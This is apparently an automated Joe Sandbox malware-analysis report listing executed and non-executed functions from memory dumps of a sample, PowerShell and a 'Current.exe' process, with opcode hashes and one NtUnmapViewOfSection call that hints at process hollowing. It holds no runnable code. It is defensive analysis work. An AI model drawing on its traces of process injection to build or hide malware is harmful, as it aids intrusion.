Instruction ID: 50b70358394a63917c415402d3858d7fc9f8727e87f55cba2a7a03ae69c55bac
Opcode Fuzzy Hash: f5787b7a8d9bd8aa803ed0489d7e82cd6bb05a36c90678b9840f477aacbadd39
Instruction Fuzzy Hash: D3018C35D0C54DDFEB20EF64C4941EDBBF0FF98350FA041A6D415D7280EB746A448A84

Function 00007FF848F3E460 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c0f2ff104e0eeaead2a153c762d5e89b9412bd6ecca5c74cbb45a87b77260c4
Instruction ID: 20cdc6318b318143d4824b03bdb9278e5bdca31aa09503c6cdd80e392b1a4283
Opcode Fuzzy Hash: 7c0f2ff104e0eeaead2a153c762d5e89b9412bd6ecca5c74cbb45a87b77260c4
Instruction Fuzzy Hash: A2F08930B5EA0A5FEB85FB7854566B93AE1EF4D220F450079D40DC7395E91C98998B40

Function 00007FF848F308A9 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13bf7516eb6c03bb59e2b717acb87df95b19b19cc64c3438a2cddb214abb3a68
Instruction ID: 2bcbb00fa4dc0dcfbf6d4b58bd5fc4c93fc84e1fd9df5381c810f254f884af1c
Opcode Fuzzy Hash: 13bf7516eb6c03bb59e2b717acb87df95b19b19cc64c3438a2cddb214abb3a68
Instruction Fuzzy Hash: 22F0FB3284E3C80FD313AB3098A52A43F70AF53210F0A01DBD888CA0A3EA195919C362

Function 00007FF8490B5490 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6cf929e496617ee503ffdcb257269473ce11378a336db623eaba1e095220f98
Instruction ID: 5ef4d73e469a24e27989a3eccb6fcf78baa859267cd049522e95a1b8c65d2391
Opcode Fuzzy Hash: b6cf929e496617ee503ffdcb257269473ce11378a336db623eaba1e095220f98
Instruction Fuzzy Hash: 05E0DF22B0DD8E1FE598FE9C68402B57380FB68254B4006BAC94EC32CAEE19E8814380

Function 00007FF8490B1BA1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd004be38c379031e9dad8af31ed2c2ee9a379b27e06b8c7103529d4f37cdb4f
Instruction ID: a9379e6c4f7bf670782477d8d197221816f1302d2c180fa3ea5b18cbd375d547
Opcode Fuzzy Hash: dd004be38c379031e9dad8af31ed2c2ee9a379b27e06b8c7103529d4f37cdb4f
Instruction Fuzzy Hash: AEE0E2A180F7D51FDB03A3B90829859BFB0AD2721178911EFC0CACB0A3E41E098A8712

Function 00007FF8490B9975 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecdd597d43cc1b25997a3b5ff88825bb2d56210251a11b1bfc83d57fee39ce88
Instruction ID: 40f16f9debc318a2f7f054659546f2065c62ef2f1a841c1398889b984dcc0571
Opcode Fuzzy Hash: ecdd597d43cc1b25997a3b5ff88825bb2d56210251a11b1bfc83d57fee39ce88
Instruction Fuzzy Hash: FCD05B5180F6C54FDB076B7948600E47F60DE7354078E41EFC088CB1D3E44D4559C312

Function 00007FF848F40758 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3ec3e76c0516d1d8154c116b81c35b4b5fd358598e112ea876db819b6d6eca
Instruction ID: 4f75a0268217306a570eff84800bfbc29d24c34c53b7ec7a9fcfed4685ae2579
Opcode Fuzzy Hash: 6a3ec3e76c0516d1d8154c116b81c35b4b5fd358598e112ea876db819b6d6eca
Instruction Fuzzy Hash: 7AD05E30B10E0D4B8B0CB62D885C434F3D1E7A9202BD45269940AC2291EE25ECC5C785

Function 00007FF848F407A8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d894064c800f49ad574bfe779a6eac297a60fdd699351369600eab289ed28d42
Instruction ID: 02ec4e9518f9a564b3bae32361c05be0e16b78163403a9aa0dd41e4e48225412
Opcode Fuzzy Hash: d894064c800f49ad574bfe779a6eac297a60fdd699351369600eab289ed28d42
Instruction Fuzzy Hash: 72D05E30B10D0D4B8B0CB62D885D430F3D1E7A96027945269940AC2291ED26ECC5C784

Function 00007FF8490B54BA Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc9790ba9c82d3032cec0680425c75a30342b23e254214a5e349671694bd917c
Instruction ID: 6385d8355f7b4297c293ce6cd2501c3b545934a52ca13db71526d65f1cf1595f
Opcode Fuzzy Hash: fc9790ba9c82d3032cec0680425c75a30342b23e254214a5e349671694bd917c
Instruction Fuzzy Hash: 25D0A721B6FC0D0FA1C4B69C34412FAF2D1FB58255F80017BD80EC22C7ED1D59894354

Function 00007FF848F31623 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 812c4edc29359389d64ebfad92213919585e79e6782c9f5fa6b789bcd0744fec
Instruction ID: a1f168d9ffcdc1a91bd5bd03e63c8f7a65a4758dcba3797a77faa8ee04774cba
Opcode Fuzzy Hash: 812c4edc29359389d64ebfad92213919585e79e6782c9f5fa6b789bcd0744fec
Instruction Fuzzy Hash: 0CE01A30A09A498FCB89EB6CC4A5AA87BF1EF5D31074100A9D00ADB6A5CA28DC408B10

Function 00007FF8490B3791 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981286f7d4634d0e31d17718e7da9fd3b6b36909e23f805e5aab1cc67a2ed363
Instruction ID: 51b9cd5ab034d87d8b3e58387383a0d917373d6bcd30e32a8a22684da3371718
Opcode Fuzzy Hash: 981286f7d4634d0e31d17718e7da9fd3b6b36909e23f805e5aab1cc67a2ed363
Instruction Fuzzy Hash: 7ED0A721B5E8090A9604F264F4419E9F3C0EB842A8F044A35D009C109DDD2D95820281

Function 00007FF848F36370 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ead3a0e58f0c5d9da20020c387d271f61ec58af7be642a7fbcbe58addd59bd6
Instruction ID: b7e902c586f6fc29034fc72f59db82dae913f6c66615067555527ca2ee10cc6c
Opcode Fuzzy Hash: 6ead3a0e58f0c5d9da20020c387d271f61ec58af7be642a7fbcbe58addd59bd6
Instruction Fuzzy Hash: 86D0C930AA49094F8B4CB72C885996072E1EB69216B9540A9D40AC72A5EA6AD889C741

Function 00007FF848F40780 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e898bf519c000987ed387466e178488bdce676e11ae049dc425e36c90a31a75
Instruction ID: 5f478419f4c283b8a81ce93be4e97c69c5f07079454e18130a257f386f47da19
Opcode Fuzzy Hash: 7e898bf519c000987ed387466e178488bdce676e11ae049dc425e36c90a31a75
Instruction Fuzzy Hash: 90D0C930A649084F8B4CB72D885996472D1EB6D216B9540A9D00EC72B1EA6AE899C741

Function 00007FF848F407D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba8426fb53cdba9a6723275a0ca9023e8976b1abea7bf696a7a3cf224e422fd5
Instruction ID: b47b11e21c49dbe9e7e21a534facabfb54bf8ee5e13ef8da9ff332f390256e01
Opcode Fuzzy Hash: ba8426fb53cdba9a6723275a0ca9023e8976b1abea7bf696a7a3cf224e422fd5
Instruction Fuzzy Hash: A8D0C930B649084F8B4CBB2C8859960B2D1EB69216B9540A9D40AC72B2EA6AD889C741

Function 00007FF848F35BB7 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114579a499c8ad840870e53751cb8768417e1d743227ecabf07d083c7e138f76
Instruction ID: 5a5ceec9f9e7b41c2822fceac059921c17cf8b781f461e6193c9981a49ae1cda
Opcode Fuzzy Hash: 114579a499c8ad840870e53751cb8768417e1d743227ecabf07d083c7e138f76
Instruction Fuzzy Hash: 21E0127180D786AFE74A9F7444571A97AA0AF06340F0404FFE449CB1D3CA2C54C54725

Function 00007FF8490B9DC0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9be02fc65a69b74e9f4279b4e8be0c8f2eaea99dbe557219f1cb04ccc31fb5
Instruction ID: f1b4aea374dc1f5994334129cb2ae39c8d972e6feb989e9561dfb58169013e59
Opcode Fuzzy Hash: 4d9be02fc65a69b74e9f4279b4e8be0c8f2eaea99dbe557219f1cb04ccc31fb5
Instruction Fuzzy Hash: 15B01230C4760A45CD283676184208030D05B0D208FC00174D40840342D46F80D54642

Non-executed Functions

Function 00007FF8490B2778 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

5_I, xrefs: 00007FF8490B27B4

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID: 5_I
API String ID: 0-2448814070
Opcode ID: 8f20aa0c73d35aea16da0b7901a35a1ec45cc8fc55f62f1c6ea994d48f74a0bb
Instruction ID: 0a84c7051284f31dee89cf2b12e08be219dec8deedf98eaf429f46bf6992ac47
Opcode Fuzzy Hash: 8f20aa0c73d35aea16da0b7901a35a1ec45cc8fc55f62f1c6ea994d48f74a0bb
Instruction Fuzzy Hash: 7A41C963C1F6C34EE766AAB81819125BE60BF32750B7940FFC4989A49BF469CD48C742

Function 00007FF848F34D54 Relevance: .8, Instructions: 758COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded62ad0ecfd9750eea15a13a7c0ed36e60066776022908560c47fa97964f9e4
Instruction ID: caa649939429f87856c3f4e7d781ada5141a27a60b3cf86a0946ade4a936e7fc
Opcode Fuzzy Hash: ded62ad0ecfd9750eea15a13a7c0ed36e60066776022908560c47fa97964f9e4
Instruction Fuzzy Hash: B532F37181E7C20FE31B9B344C625A07FA1EF57255B1A46EFC4D68B0E3D518691BC3A2

Function 00007FF848F34F38 Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ddc51b09b836e18df37782541722a1f902140d28e0aa137191d55a1ae2953c
Instruction ID: 863532af66ffe20d8181873cb0f75a61a22ca82e5868c112273886d195234465
Opcode Fuzzy Hash: 60ddc51b09b836e18df37782541722a1f902140d28e0aa137191d55a1ae2953c
Instruction Fuzzy Hash: C281B97191C7960FE32D5A284C820717794EF87256F1942BECEDBC31C3DA19B81782D6

Function 00007FF8490B000A Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d671f1d320e6538cc85a165862723936a2fb469eb330881b94e49f0e6487d6b
Instruction ID: b0fbe42aec63f75b08a3f40e2648d5ecaa30c7a910a9a31126922eccf11ff417
Opcode Fuzzy Hash: 7d671f1d320e6538cc85a165862723936a2fb469eb330881b94e49f0e6487d6b
Instruction Fuzzy Hash: 24B18622C1F2D29FE796FBB8B4914E63BB0EF52298B0941F7D08C8D097DD0CA8458755

Function 00007FF8490B0F85 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53e80a431e1605e6fa95f313c95d4373feab46164d6b2d413b34deda41f9555
Instruction ID: d0c23ed4ce88a3010be017bb4790ed5b79e4f3939e1aaf32e8a7a94a64dbca9c
Opcode Fuzzy Hash: f53e80a431e1605e6fa95f313c95d4373feab46164d6b2d413b34deda41f9555
Instruction Fuzzy Hash: FEB1DA3281F6C70FE7AADAB4584912ABFA4AF62354B2804FFC098CB0DFD695D815C741

Function 00007FF8490B1018 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e417ced63a34ed379bf7223865f8add5878d146cd2a81f631d515ccda4f0a225
Instruction ID: a2ddeb1b0de8dd287f95203887968adfe6c0c7262615652922b48febd371ec98
Opcode Fuzzy Hash: e417ced63a34ed379bf7223865f8add5878d146cd2a81f631d515ccda4f0a225
Instruction Fuzzy Hash: 0481833281F6C70EE7AADEB8185942BBFA4AF6135072944FFC058CB0EFD695C9198741

Function 00007FF8490B5C40 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2147305273.00007FF8490B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff8490b0000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef84fed4fc9f310df6d58829ac1c51e5200e91abfa75dad0ad7c9bce42a07680
Instruction ID: 9c659e085f6a000b5ed63259b112a033644923f59c5ebb4eadd3a5ceedc80221
Opcode Fuzzy Hash: ef84fed4fc9f310df6d58829ac1c51e5200e91abfa75dad0ad7c9bce42a07680
Instruction Fuzzy Hash: 90510596D2FAC24FF67A5A7C38192752F81FF72B50B0C06FAD0484B0DB582DDD069A81

Function 00007FF848F305FA Relevance: 5.1, Strings: 4, Instructions: 135COMMON

Download Yara Rule

Strings

>M_^, xrefs: 00007FF848F30601
M_^|, xrefs: 00007FF848F306CA
M_^z, xrefs: 00007FF848F306C2
M_^|, xrefs: 00007FF848F306C9

Memory Dump Source

Source File: 00000000.00000002.2146382160.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_o9OIGsDt4m.jbxd

Similarity

API ID:
String ID: >M_^$M_^z$M_^|$M_^|
API String ID: 0-3895440685
Opcode ID: 17f7c1c2bae8ebbbd5de8e71a0671323ae3c87e62b7a652f5765d8d7209f78fa
Instruction ID: d5837c887a5134ff7eefbf92cf7aea326d84f431931ed30416cf1bd15a6aae18
Opcode Fuzzy Hash: 17f7c1c2bae8ebbbd5de8e71a0671323ae3c87e62b7a652f5765d8d7209f78fa
Instruction Fuzzy Hash: 7A31821BB2B92A66926172AE78464FE6750DFC07FAF084773D69CCC0D35E0D208545F9

Analysis Process: powershell.exePID: 2300, Parent PID: 1068COMMON

Executed Functions

Function 00007FF849006605 Relevance: 6.7, Strings: 5, Instructions: 435COMMON

Download Yara Rule

Strings

(B%I, xrefs: 00007FF849006974
(B%I, xrefs: 00007FF84900678C
(B%I, xrefs: 00007FF849006858
(B%I, xrefs: 00007FF8490067C3
(B%I, xrefs: 00007FF8490066ED

Memory Dump Source

Source File: 00000002.00000002.2262058435.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: (B%I$(B%I$(B%I$(B%I$(B%I
API String ID: 0-1877043794
Opcode ID: 6b93e180d7f13a535384ac5353a2942d2aaaa204a61acabe76a00f06b9ae6ea0
Instruction ID: a475f1c45c21b72b02d6b22e5c2518df98e5ed572c652dfd66291de316e9a709
Opcode Fuzzy Hash: 6b93e180d7f13a535384ac5353a2942d2aaaa204a61acabe76a00f06b9ae6ea0
Instruction Fuzzy Hash: D7D14732D0EAC95FEB65AF6868155B5BBE1EF16354F0802FED04DD7093EA18E805C352

Function 00007FF849004073 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

8>%I, xrefs: 00007FF84900413A

Memory Dump Source

Source File: 00000002.00000002.2262058435.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: 8>%I
API String ID: 0-3722309147
Opcode ID: 67f924d4f4370ca8e184cc663faf4eac9d540b0929dad4a72fab1bf27193e221
Instruction ID: 9b6b92a0ffcd2a66d1068b28deb77e02dedd5290e6d593a05ba5b80bb1085edb
Opcode Fuzzy Hash: 67f924d4f4370ca8e184cc663faf4eac9d540b0929dad4a72fab1bf27193e221
Instruction Fuzzy Hash: 70510932E0DA864FEBA9EE1C64116B577E2EF54660F5801FAC00DC7197FE28EC158399

Function 00007FF8490040BF Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

8>%I, xrefs: 00007FF84900413A

Memory Dump Source

Source File: 00000002.00000002.2262058435.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: 8>%I
API String ID: 0-3722309147
Opcode ID: 929b821794afa5085c71530a252cef6c508ee5914688b7c5c1f60ce5d865af3e
Instruction ID: b07f9b4e59c2d1d23aa877d012dc5ac91aa098c86a34ea16156d143b2556ed57
Opcode Fuzzy Hash: 929b821794afa5085c71530a252cef6c508ee5914688b7c5c1f60ce5d865af3e
Instruction Fuzzy Hash: 3841E632E0DA8A4FEBA9EE1C64515B577D1EF64261B5801FAC00EC7193FE28EC158389

Function 00007FF849004370 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

p>%I, xrefs: 00007FF8490043ED

Memory Dump Source

Source File: 00000002.00000002.2262058435.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: p>%I
API String ID: 0-2206047945
Opcode ID: d1fc0a0977033b9f23acce99aedd31a5318b59ce16408e1087a2e0c127e48b79
Instruction ID: 522f2c38a95b78abc0ab25d4258e4257280c980a484b3f276d4bda196194096d
Opcode Fuzzy Hash: d1fc0a0977033b9f23acce99aedd31a5318b59ce16408e1087a2e0c127e48b79
Instruction Fuzzy Hash: BE410232E0DA8A4FEBA9EA2C74116B977E1EF45760B0810FAC049C7183FA18EC058395

Function 00007FF8490043BC Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

p>%I, xrefs: 00007FF8490043ED

Memory Dump Source

Source File: 00000002.00000002.2262058435.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd

Similarity

API ID:
String ID: p>%I
API String ID: 0-2206047945
Opcode ID: c49708f7baf2b8857baa7978000dc25272bff0da8dd4b71f21c3a36ebf0ad4b1
Instruction ID: 2a9b81925b7ed9565beea46bfca6b0f448db2a3b345aabefd59ea9e6a0d99b09
Opcode Fuzzy Hash: c49708f7baf2b8857baa7978000dc25272bff0da8dd4b71f21c3a36ebf0ad4b1
Instruction Fuzzy Hash: 5C310432F0DA898FEBA4EA1CB4516F877E1EF45661B0810FBC149C3193FA18EC158395

Function 00007FF848F3A1FA Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2258556075.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0420da9d27ebf4311f292d6372a05c37f946ef2190b18950aa9140e1e53992ee
Instruction ID: 1de491902b5b5cb1ca17281300ef91de355ff5153ed059be865d837493c844b0
Opcode Fuzzy Hash: 0420da9d27ebf4311f292d6372a05c37f946ef2190b18950aa9140e1e53992ee
Instruction Fuzzy Hash: F711183180EBC98FD743AB785C694947FB0EF53244B1901EBD488CB0E3D61A9888C7A6

Function 00007FF848F3985D Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2258556075.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7eb18bae7001311e4d76b017c1fa651b41f4f5a275260ad2c931e4ed9d6c16
Instruction ID: 395a2a4efee4f7af8022078729bcba50f63ae59266d686d387bb932c56b8f9a3
Opcode Fuzzy Hash: 3f7eb18bae7001311e4d76b017c1fa651b41f4f5a275260ad2c931e4ed9d6c16
Instruction Fuzzy Hash: B7411731A1CB484FDB199B1C9C0A6E97BE0FF95720F04423FD44D93692CB256855CBC6

Function 00007FF848E1E380 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2255609836.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848e1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8194aa79340b1447c59332f2969941d339061987fb02b1d5ea6db40f3162e1f9
Instruction ID: 6d948c4271aeda7e52b32c817288fb51a30ea99fa64b44b713cc6a65fe3eee2e
Opcode Fuzzy Hash: 8194aa79340b1447c59332f2969941d339061987fb02b1d5ea6db40f3162e1f9
Instruction Fuzzy Hash: A741147080DBC54FE79A9B2898459523FF0FF52350F1505EFE088CB1A3DB25A846C792

Function 00007FF848F3A74C Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2258556075.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344b818e6f04c3c97cc9242fe5ed68950b49e254040861f650d406f82098ae02
Instruction ID: f314993b48885ed09713234afaac6eebbc2dd5a4a1ede010cd54807807735449
Opcode Fuzzy Hash: 344b818e6f04c3c97cc9242fe5ed68950b49e254040861f650d406f82098ae02
Instruction Fuzzy Hash: 4421357080C7888FEB099B68888A6F97FB4EB53321F08415BD444DB1A3CA685846CBA5

Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2258556075.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

Analysis Process: Current.exePID: 7104, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.7%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF8490C3D8D Relevance: 1.6, APIs: 1, Instructions: 112
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FF8490C3E2E

Memory Dump Source

Source File: 00000004.00000002.2198836007.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff8490c0000_Current.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 642993272147b17902ed925a075c6c4d98a21fc9dea7c2229e1aadf649010be2
Instruction ID: 6cc3e5ba68ed2141a7e26e9b9eefe8e393dedc7021280e3c24dd2ef27cadadf3
Opcode Fuzzy Hash: 642993272147b17902ed925a075c6c4d98a21fc9dea7c2229e1aadf649010be2
